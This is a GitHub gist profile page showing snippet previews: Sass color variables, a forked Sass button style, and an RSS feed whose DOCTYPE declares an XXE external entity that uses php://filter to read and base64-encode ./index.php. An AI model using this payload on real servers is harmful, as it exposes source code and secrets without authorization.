Skip to content

Instantly share code, notes, and snippets.

View kzon's full-sized avatar
:shipit:

Anton Kobzev kzon

:shipit:
View GitHub Profile
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE test [ <!ENTITY fogggs SYSTEM "php://filter/convert.base64-encode/resource=./index.php"> ]>
<rss version="2.0">
<channel>
<title>RSS Title</title>
<description>This is an example of an RSS feed</description>
<link>http://www.example.com/main.html</link>
<lastBuildDate>Mon, 06 Sep 2010 00:01:00 +0000 </lastBuildDate>
<pubDate>Sun, 06 Sep 2009 16:20:00 +0000</pubDate>
<ttl>1800</ttl>
$aqua: #7FDBFF
$blue: #0074D9
$navy: #001F3F
$teal: #39CCCC
$green: #2ECC40
$olive: #3D9970
$lime: #01FF70
$yellow: #FFDC00
$orange: #FF851B
@kzon
kzon / button.sass
Last active May 7, 2017 16:16 — forked from agragregra/button.sass
Button Sass Styles (Universal Starter)
.button
display: inline-block
border: none
color: #fff
text-decoration: none
background-color: $accent
padding: 15px 45px
font-size: 13px
text-transform: uppercase
font-weight: 600